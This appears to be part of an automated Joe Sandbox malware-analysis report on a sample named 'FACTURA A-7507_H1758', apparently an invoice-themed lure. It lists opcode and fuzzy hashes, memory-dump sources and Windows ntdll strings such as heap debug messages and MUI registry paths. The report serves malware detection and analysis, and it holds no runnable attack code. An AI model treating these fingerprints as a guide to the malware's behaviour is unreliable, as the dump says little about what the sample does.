                                                                                                                                                                                                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                                                                                          • API String ID: 3446177414-1700792311
                                                                                                                                                                                                                          • Opcode ID: d7c2733b8f2ce2ed86905fac97e56d8d7517a707755ebecf5eba931f97bf1bac
                                                                                                                                                                                                                          • Instruction ID: d9870d1b1fdd887c92d52be1a39ff0a1850c4c6ab23ef19ee02389bc6bcb3c53
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d7c2733b8f2ce2ed86905fac97e56d8d7517a707755ebecf5eba931f97bf1bac
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E0D1FD35614685EFCB0ACFA4D450AA9FBF2FF09701F08849EE459AB352DB35A942CF10
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$h.E5
                                                                                                                                                                                                                          • API String ID: 0-2231611123
                                                                                                                                                                                                                          • Opcode ID: 2e771b5b5c1f15647a025c937b959b5203f35bf73cda1c604e7956059b72e856
                                                                                                                                                                                                                          • Instruction ID: b166edab3a1a8f6ea597572ab38d55818d3265cbda111d9980d856895ececa4e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e771b5b5c1f15647a025c937b959b5203f35bf73cda1c604e7956059b72e856
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5DB17AB290C3619FD719CE24C440B5BB7E8BF88754F42496EF895A7340DBB0D94A8B92
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                                                                                                                                                          • API String ID: 3446177414-1745908468
                                                                                                                                                                                                                          • Opcode ID: 978f2129d9048adac6d522bb21e3ae641a1c2b6090a1c3c086424ab0c201a8ef
                                                                                                                                                                                                                          • Instruction ID: fee2e3d4398de87c6af51c8936a811349a25a70f171fcc150911839529956178
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 978f2129d9048adac6d522bb21e3ae641a1c2b6090a1c3c086424ab0c201a8ef
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF91CC75A04744AFDB19CFA4C860A9DFBF2FF49710F15809EE845AB352CB769941CB10
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 3542D202
                                                                                                                                                                                                                          • @, xrefs: 3542D24F
                                                                                                                                                                                                                          • @, xrefs: 3542D09D
                                                                                                                                                                                                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 3542D263
                                                                                                                                                                                                                          • h.E5, xrefs: 3548A5D2
                                                                                                                                                                                                                          • Control Panel\Desktop\LanguageConfiguration, xrefs: 3542D136
                                                                                                                                                                                                                          • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 3542D06F
                                                                                                                                                                                                                          • @, xrefs: 3542D2B3
                                                                                                                                                                                                                          • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 3542D0E6
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration$h.E5
                                                                                                                                                                                                                          • API String ID: 0-1285789325
                                                                                                                                                                                                                          • Opcode ID: 7e103ff69ca4e97433c5f9135fc797c34cec1d19bab9f13700a897abda5c7926
                                                                                                                                                                                                                          • Instruction ID: 3c4f62e2498bd332e3a2e93e274896c1278846da89a21c1c7267905d7173fb11
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e103ff69ca4e97433c5f9135fc797c34cec1d19bab9f13700a897abda5c7926
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B1A17BB19083559FE329CF21C440B9BB7E8BF84765F01492EF99896240E7B4D949CF93
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RtlDebugPrintTimes.NTDLL ref: 3545D879
                                                                                                                                                                                                                            • Part of subcall function 35434779: RtlDebugPrintTimes.NTDLL ref: 35434817
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                          • API String ID: 3446177414-1975516107
                                                                                                                                                                                                                          • Opcode ID: 687f1d040e50c4a8f8bd6c5135ec59de73686892709db9cb1cd2cf7610463bcb
                                                                                                                                                                                                                          • Instruction ID: 1685e2775ef71dbad6fdf03030df7d943905cb1fefcd052327dda6edf4fb3dea
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 687f1d040e50c4a8f8bd6c5135ec59de73686892709db9cb1cd2cf7610463bcb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA51CEB5A043459FEB0CCFB4C48479DBBB1BF44724F66459AD811AB381DB70AA86CBD0
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                                                                                                                                                                                                          • API String ID: 0-2224505338
                                                                                                                                                                                                                          • Opcode ID: 38fdca8c39aa19a54798b608a35ee372b45731904379bd40d9d97374bfef3e03
                                                                                                                                                                                                                          • Instruction ID: b8f9293f3f5b5dcc82c28d10635cd7267878b815cf956c47b150a34b866887cf
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 38fdca8c39aa19a54798b608a35ee372b45731904379bd40d9d97374bfef3e03
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8751BE76625354BFD72DCBA4C8B4E9AF3F4EF046A4F1184AAF401AB712CA729941CE11
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                                          • API String ID: 0-523794902
                                                                                                                                                                                                                          • Opcode ID: f2f986c8339e83bb2fc02db3caadbac792858a4958f521bc900d1c4ee714df4e
                                                                                                                                                                                                                          • Instruction ID: 43f687cfc27273f5203bb93b79a68003a825b98c1e5c7bd4a6544eee1ee1ff4e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2f986c8339e83bb2fc02db3caadbac792858a4958f521bc900d1c4ee714df4e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE42EE75209791AFD30DCF24C880A6AB7F5FF88744F8449ADE4858B351DB71E982CB52
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs$h.E5
                                                                                                                                                                                                                          • API String ID: 0-1571450501
                                                                                                                                                                                                                          • Opcode ID: 338cedf3ce980dd938314732b917f44b32c00a4e269feeaad9e727b07c622aa6
                                                                                                                                                                                                                          • Instruction ID: 7a96269fe47ecfa6bd0637dc3c40fd9d044494c99877a9a13c691f614b51ee57
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 338cedf3ce980dd938314732b917f44b32c00a4e269feeaad9e727b07c622aa6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E8F15FB6E04219EFDB09CF94C980EEEBBB9FF09650F51446AE515E7210EB709E05CB90
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                                                                                                                                          • API String ID: 0-122214566
                                                                                                                                                                                                                          • Opcode ID: 41939baef884a21e5b6349847457041a9ae0ba5bbcea590f628fef9fd35a5ae3
                                                                                                                                                                                                                          • Instruction ID: 4d09f338aa0079ce3b17a1c27361eba9ed1f6962d0ba037dc945d6ba87d8e9a4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 41939baef884a21e5b6349847457041a9ae0ba5bbcea590f628fef9fd35a5ae3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1DC126B5A443159BFF0DCB69C881BBEBBB1BF45740F5480A9E802AB390DBB4D945C390
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                                          • API String ID: 0-4253913091
                                                                                                                                                                                                                          • Opcode ID: 7f8705eb5177cf0f25fd23b603c1d278420c7a198c812d943b604d8bd8c0b3af
                                                                                                                                                                                                                          • Instruction ID: 779362e587ad91c415f155f8a1bb4b50ae0b9eada86e2b76f8e1cc3f667f42e5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7f8705eb5177cf0f25fd23b603c1d278420c7a198c812d943b604d8bd8c0b3af
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23F18BB4A40605DFEB1CCF68C984FAABBB5FF44344F108199E40A9B385DB74E991CB91
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                                                                                                                                                          • API String ID: 3446177414-2283098728
                                                                                                                                                                                                                          • Opcode ID: e7dbd3dea4fac7fae937dff72e6c2bec8f37c18a69dca31f6dc1c5241bc8a0d2
                                                                                                                                                                                                                          • Instruction ID: fa51f3d6d02b93f506f1f418b753d304ace1e08ec62c3bd4a6262181d7bf13cf
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e7dbd3dea4fac7fae937dff72e6c2bec8f37c18a69dca31f6dc1c5241bc8a0d2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6651F1757143019FE71CDF38C884B1A77B2BB88724F150AAEE4529B791EB70E845CB92
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3446177414-0
                                                                                                                                                                                                                          • Opcode ID: 9be0bd71529f13da62d5c9cce04a3eddf536f258d885151907bd69ee6c05c217
                                                                                                                                                                                                                          • Instruction ID: 5507862cb9f417e455efbe9f1e03aed9737db2000f47097bcb48ccb70bd0d01a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9be0bd71529f13da62d5c9cce04a3eddf536f258d885151907bd69ee6c05c217
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14F1E4B6E006118BCB08CF69C9E067EBBF6BF88250B59416DD856DB380D634FA45CF90
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                                                                                                                                                          • API String ID: 0-3061284088
                                                                                                                                                                                                                          • Opcode ID: d6db09154ac9252edfb1d99475ca39553649e27997283ba6de4ca612d6dfa7a6
                                                                                                                                                                                                                          • Instruction ID: a654dc2aaa7cf87dd5b9bc10fc20c0ac094b320d45a23f7e26ee508f41564320
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d6db09154ac9252edfb1d99475ca39553649e27997283ba6de4ca612d6dfa7a6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC014C36124160EED30D9329E408F87B7F4EB41731F2544DEE40097B90CE969845DF51
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: $$.mui$.mun$SystemResources\
                                                                                                                                                                                                                          • API String ID: 0-3047833772
                                                                                                                                                                                                                          • Opcode ID: 098fb2b254d652916922ee2d981dbce7228a43acbcbb839417feed9c7c2a5498
                                                                                                                                                                                                                          • Instruction ID: 997f682edbf69ff5a7e0dd2de516800055aeee6e67fd7406f039a24bb0e022e5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 098fb2b254d652916922ee2d981dbce7228a43acbcbb839417feed9c7c2a5498
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 64624B72B017299EDB29CF54CC41BD9B7B9BF0A350F0081E9D409A7A60EB319E95CF52
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                                                                                          • API String ID: 0-3178619729
                                                                                                                                                                                                                          • Opcode ID: 3b93d2d17ef81a8116407881b94aeff670d56b0bc6dce4df8a42806a34716824
                                                                                                                                                                                                                          • Instruction ID: 5bf1b6b616c822ed9162756c0ceb1a6444fb342df7076039955bc892a973d060
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b93d2d17ef81a8116407881b94aeff670d56b0bc6dce4df8a42806a34716824
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 86E2BFB4A443559FEB18CF68D480BAABBF1FF49304F5481ADE845AB385D774A842CF90
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: LU@5$LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                                                                                                                                                                          • API String ID: 0-572084478
                                                                                                                                                                                                                          • Opcode ID: 9a39db125ad3cc1003dc69d060dbcc0b942c35d17195942e117bcf99891a6b3f
                                                                                                                                                                                                                          • Instruction ID: 9bb195471600d0a4eae18fe42950aec473f20a3740a92ea19f3236ad51979306
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9a39db125ad3cc1003dc69d060dbcc0b942c35d17195942e117bcf99891a6b3f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 60B1AB75A057448BDB2CCF68C992B9DBBB2BF89754F108469E851EB3A0E730EC51CB10
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit$X}A5
                                                                                                                                                                                                                          • API String ID: 0-400769617
                                                                                                                                                                                                                          • Opcode ID: 5cd042918833f59bc039e33ab3e6eaffb90975aba57f60771e2ca1040a74c4eb
                                                                                                                                                                                                                          • Instruction ID: ed325b3971649402bc1549752d3622c8c1eca7ccf1f59301b4f25480001f9ec2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5cd042918833f59bc039e33ab3e6eaffb90975aba57f60771e2ca1040a74c4eb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 46818079608340AFE719CB64C880B5AB7F8FF84B50F4049ADF9959B3A0EB74D944CB52
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: LU@5$LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                                                                                                                                                                                          • API String ID: 0-4265572130
                                                                                                                                                                                                                          • Opcode ID: b8256f5db92a0c66cac4429686ddf1269fdfacd2b145066f37349716dbc69600
                                                                                                                                                                                                                          • Instruction ID: 59d41914434bdde6b61c14e8661b5169e9abc6c86130d8dac7f9a200f7a407de
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b8256f5db92a0c66cac4429686ddf1269fdfacd2b145066f37349716dbc69600
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B091F075A0A359CFEB19CF54C442BDDB7B0FF09368F544199E801AB3A0E7789A91CB90
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                                                                                                                                                          • API String ID: 0-2586055223
                                                                                                                                                                                                                          • Opcode ID: a787ed8cf793798b907c36eb0755f6e2182036683df93cd2a8e7a558e6abfbef
                                                                                                                                                                                                                          • Instruction ID: 5dd6129784b4edad1fec67945f5377c910a8b1d60d20532f9c4b05b112f06149
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a787ed8cf793798b907c36eb0755f6e2182036683df93cd2a8e7a558e6abfbef
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF610076208390AFE319CB64C845F57B7F9FF80B90F0448A9E9549B391DB35E841CB62
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
